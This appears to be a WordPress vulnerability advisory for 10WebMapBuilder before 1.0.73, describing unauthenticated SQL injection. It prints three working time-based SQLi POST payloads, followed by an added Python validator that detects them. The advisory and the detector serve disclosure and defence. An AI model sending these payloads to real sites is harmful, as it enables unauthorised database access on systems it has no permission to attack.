wpexploit, Daniel Krohmer, WPEX-ID:33AB1FE2-6611-4F43-91BA-52C56F02ED56
History: Feb 20, 2023 - 12:00 a.m.

10WebMapBuilder < 1.0.73 - Unauthenticated SQLi

EPSS: 0.003 (Low), percentile 70.7%

The plugin does not properly sanitise and escape some parameters before using them in an SQL statement via an AJAX action available to unauthenticated users, leading to SQL injection.

Note: /2022/12/29/map/ is the page/post where Google_Maps_WD is embedded.

POST /2022/12/29/map/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 85

radius=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)&lat=0.0&lng=0.0&distance_in=km


POST /2022/12/29/map/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 171

radius=1&lat=0.0))))+AS+distance+FROM+wp_gmwd_markers+as+T_MARKERS+where+T_MARKERS.published=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)--+)&lng=0.0&distance_in=km


POST /2022/12/29/map/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 171

radius=1&lat=0.0&lng=0.0))))+AS+distance+FROM+wp_gmwd_markers+as+T_MARKERS+where+T_MARKERS.published=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)--+)&distance_in=km
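
An added example, not part of the advisory or the plugin's code: a strict validator for the four form fields used in the requests above, usable as detection logic over logged POST bodies or as a model for the server-side check the description says is missing. The function name, the numeric limits and the unit allow-list are assumptions.

```python
import re
from urllib.parse import parse_qs

# Assumed limits (not taken from the plugin): degrees for coordinates,
# a bounded radius, and an allow-list of distance units.
NUMERIC_FIELDS = {"radius": (0.0, 20000.0), "lat": (-90.0, 90.0), "lng": (-180.0, 180.0)}
ALLOWED_UNITS = {"km", "mile"}
PLAIN_DECIMAL = re.compile(r"-?[0-9]{1,6}(\.[0-9]{1,12})?")


def check_map_search_body(body: str) -> list[str]:
    """Return findings for one urlencoded POST body; an empty list means clean."""
    params = parse_qs(body, keep_blank_values=True)
    findings = []
    for name, (low, high) in NUMERIC_FIELDS.items():
        values = params.get(name, [])
        if len(values) != 1:
            # Missing or repeated fields are rejected rather than guessed at.
            findings.append(f"{name}: expected one value, got {len(values)}")
        elif not PLAIN_DECIMAL.fullmatch(values[0]):
            # Only a plain decimal is accepted; spaces, brackets, SQL keywords fail here.
            findings.append(f"{name}: not a plain decimal: {values[0][:40]!r}")
        elif not low <= float(values[0]) <= high:
            findings.append(f"{name}: out of range: {values[0]}")
    units = params.get("distance_in", [])
    if len(units) != 1 or units[0] not in ALLOWED_UNITS:
        findings.append(f"distance_in: unexpected value {units!r}")
    return findings


# Bodies 1-3 are the request bodies quoted in the advisory above;
# body 4 is a constructed benign request.
SAMPLE_BODIES = [
    "radius=1+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)&lat=0.0&lng=0.0&distance_in=km",
    "radius=1&lat=0.0))))+AS+distance+FROM+wp_gmwd_markers+as+T_MARKERS+where+T_MARKERS.published=1"
    "+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)--+)&lng=0.0&distance_in=km",
    "radius=1&lat=0.0&lng=0.0))))+AS+distance+FROM+wp_gmwd_markers+as+T_MARKERS+where+T_MARKERS.published=1"
    "+and+(SELECT+7741+FROM+(SELECT(SLEEP(5)))hlAf)--+)&distance_in=km",
    "radius=5&lat=48.1&lng=11.5&distance_in=km",
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(check_map_search_body(body) or "clean")
```

Validation of this kind complements, and does not replace, parameterised queries in the plugin itself.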
